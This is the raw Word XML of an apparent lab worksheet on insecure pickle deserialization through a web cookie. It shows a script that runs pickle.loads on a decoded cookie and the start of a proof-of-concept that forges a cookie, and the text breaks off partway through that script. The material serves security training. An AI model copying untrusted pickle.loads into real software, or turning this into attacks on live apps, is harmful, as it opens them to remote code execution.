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E4C5B" w14:textId="48F0E7CC" w:rsidR="007337F0" w:rsidRDefault="007337F0"/>
    <w:p w14:paraId="5CF958AC" w14:textId="64CB96F9" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="716BBC26" w14:textId="4D1DFB02" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="123369A6" w14:textId="5968CAB0" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="2434A36C" w14:textId="126E25C7" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="26ABF7F8" w14:textId="2E54B32C" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="026A5CCE" w14:textId="4576F8B1" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="002F7E71" w14:textId="39125AE4" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="1035AC42" w14:textId="761E1027" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="7A5EA080" w14:textId="1B4043EA" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="0B7A33C4" w14:textId="6A208BD1" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="7DA0B1CE" w14:textId="18D226B9" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="5124367C" w14:textId="754B247C" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="5EC3A966" w14:textId="13468DBE" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="14B863C7" w14:textId="00D89427" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="0FB83AE4" w14:textId="29B80270" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="13425E37" w14:textId="742525CD" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="50282C69" w14:textId="303C8ED6" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="1E4087A7" w14:textId="2CA0D854" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="3197CD02" w14:textId="27A08BF0" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="5525313B" w14:textId="0EDE835F" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="09628C50" w14:textId="24AD8067" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="2F23B0C2" w14:textId="0740C4F1" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="5AD00972" w14:textId="7A074795" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="045211EC" w14:textId="5B8648B3" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="499FDD2F" w14:textId="14F52BF8" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="1CA47F0B" w14:textId="6DAA9A71" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="44F3CBE6" w14:textId="57E2114B" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="16BE42D0" w14:textId="1C15F3DD" w:rsidR="006550AC" w:rsidRDefault="006550A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240"/>
        <w:gridCol w:w="1440"/>
      </w:tblGrid>
      <w:tr w:rsidR="006550AC" w14:paraId="7C3F29B2" w14:textId="77777777" w:rsidTr="00BB77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848C9" w14:textId="77777777" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="00BB77BB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V15 — Insecure Deserialization — Pickle RCE via Cookie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D1B50" w14:textId="77777777" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="00BB77BB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TIER 3 — HARD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DB32A" w14:textId="77777777" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="00BB77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8 pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C207162" w14:textId="10D2ED8E" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="396884F4" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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1C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>What to look for in requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C16106" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suspicious parameters often appear in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB421F6" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie values </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B879ABB" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hidden form fields </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C47D2E5" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">POST bodies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7288A9" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">file uploads </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1A3B2" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">custom headers </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21B783" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1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57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">binary API endpoints </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCD342" w14:textId="6DD5D97A" w:rsidR="00520596" w:rsidRPr="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="00520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C57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session/state parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC9C4A" w14:textId="13C8BE62" w:rsidR="005F1C57" w:rsidRDefault="00520596" w:rsidP="00520596">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3662A640" wp14:editId="25E5759D">
            <wp:extent cx="5943600" cy="15214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596">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a parameter or cookie starting with </w:t>
      </w:r>
      <w:r w:rsidRPr="00520596">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>rO0</w:t>
      </w:r>
      <w:r w:rsidRPr="00520596">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, that is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00520596">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> prime candidate to check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD6AAE" w14:textId="173C75BE" w:rsidR="00520596" w:rsidRDefault="00520596" w:rsidP="00520596">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057DC016" w14:textId="443EB919" w:rsidR="00520596" w:rsidRDefault="00520596" w:rsidP="00520596">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354FDB42" w14:textId="77777777" w:rsidR="00520596" w:rsidRDefault="00520596" w:rsidP="00520596">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D66527" w14:textId="539B5163" w:rsidR="006550AC" w:rsidRDefault="006550AC">
      <w:r w:rsidRPr="006550AC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218EC77E" wp14:editId="6FE0FEA7">
            <wp:extent cx="5943600" cy="2599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17B6" w14:textId="5D5E472F" w:rsidR="00520596" w:rsidRDefault="00520596"/>
    <w:p w14:paraId="04DDB84F" w14:textId="48F46732" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="6327C15A" w14:textId="38D2D013" w:rsidR="00ED669D" w:rsidRDefault="00ED669D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A853376" wp14:editId="138E9E8B">
            <wp:extent cx="5943600" cy="2802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4C11" w14:textId="5390EE28" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="7A0D6765" w14:textId="6F4478FC" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="30E25FF2" w14:textId="77879F40" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="28F56060" w14:textId="687EFBBE" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="6A8CA30E" w14:textId="305833AB" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="42C2E9F5" w14:textId="4A9636BE" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="7FBEEF96" w14:textId="5AFA4227" w:rsidR="00ED669D" w:rsidRDefault="00ED669D"/>
    <w:p w14:paraId="6C0D7C9E" w14:textId="22D41D12" w:rsidR="006550AC" w:rsidRPr="00ED669D" w:rsidRDefault="006550AC" w:rsidP="006550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D669D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Decode the value of the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C0D83" w14:textId="2D5A8A96" w:rsidR="006550AC" w:rsidRPr="00ED669D" w:rsidRDefault="006550AC" w:rsidP="006550AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>decode_cookie.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05836D32" w14:textId="7D03A633" w:rsidR="006550AC" w:rsidRPr="00ED669D" w:rsidRDefault="006550AC" w:rsidP="006550AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>decode_cookie.py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550AC" w14:paraId="4A254E64" w14:textId="77777777" w:rsidTr="006550AC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7FA277A2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bookmarkStart w:id="0" w:name="_Hlk226378018"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D48009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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>import pickle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7140883F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53B7D4D1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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>paste</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> your cookie here</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6C408C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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>data = "gASVOgAAAAAAAAB9lCiMBXRoZW1llIwFbGlnaHSUjAhsYW5ndWFnZZSMAmVulIwNbm90aWZpY2F0aW9uc5SMAm9ulHUu"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F526E8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3CE26946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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Step 1: Decoding base64...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54ED77D9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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>decoded = base64.b64decode(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351B9C5F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7F4AA87F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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"Decoded bytes:")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E2F14FB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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(decoded)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F44E356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30D2215A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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2: Loading pickle...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08563BA3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6550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">obj = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pickle.loads</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(decoded)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F3A89B2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33C15552" w14:textId="77777777" w:rsidR="006550AC" w:rsidRPr="006550AC" w:rsidRDefault="006550AC" w:rsidP="006550AC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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nFinal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> result:")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1539169D" w14:textId="75A40193" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="006550AC">
            <w:pPr>
              <w:ind w:left="360"/>
            </w:pPr>
            <w:r w:rsidRPr="006550AC">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>print(obj)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p w14:paraId="50F06DB0" w14:textId="77777777" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="006550AC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9AC57A" w14:textId="545C7BAC" w:rsidR="006550AC" w:rsidRDefault="006550AC" w:rsidP="006550AC">
      <w:r w:rsidRPr="006550AC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B015AB6" wp14:editId="3B400A33">
            <wp:extent cx="5943600" cy="2708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4D96" w14:textId="1429E591" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="647C89E0" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1C57">
      <w:r>
        <w:t>That means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F80AA" w14:textId="3225856E" w:rsidR="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1C57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>your cookie is a pickle object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A7D76B" w14:textId="77777777" w:rsidR="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1C57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>it is decoded successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2658ACF1" w14:textId="46FFFFA8" w:rsidR="005F1C57" w:rsidRDefault="005F1C57" w:rsidP="005F1C57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>your app is using pickle for user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E960846" w14:textId="5D522D88" w:rsidR="006550AC" w:rsidRDefault="006550AC"/>
    <w:p w14:paraId="34A9A7BA" w14:textId="4B10F3C0" w:rsidR="00ED669D" w:rsidRPr="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669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D669D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Confirm Java deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B95F8" w14:textId="7AB1D600" w:rsidR="00ED669D" w:rsidRDefault="00ED669D" w:rsidP="00ED669D">
      <w:r w:rsidRPr="00ED669D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nano</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED669D">
        <w:t xml:space="preserve"> poc_modify_cookie.py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D669D" w14:paraId="6313AA5D" w14:textId="77777777" w:rsidTr="00BB77BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8990" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="23C68C06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>import pickle</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F696ED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>import base64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1908C649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00AB9D3D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># Step 1: Create custom preferences (safe data only)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BBE1E9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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>prefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD67CB1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 xml:space="preserve">    "theme": "dark",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7A5776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 xml:space="preserve">    "language": "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>fr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7A1672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 xml:space="preserve">    "notifications": "off"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49BBDF51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>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47730057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21E0E23F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># Step 2: Serialize using pickle (same as the app)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B546028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 xml:space="preserve">serialized = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pickle.dumps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00ED669D">
              <w:rPr>
                <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>prefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00ED669D">
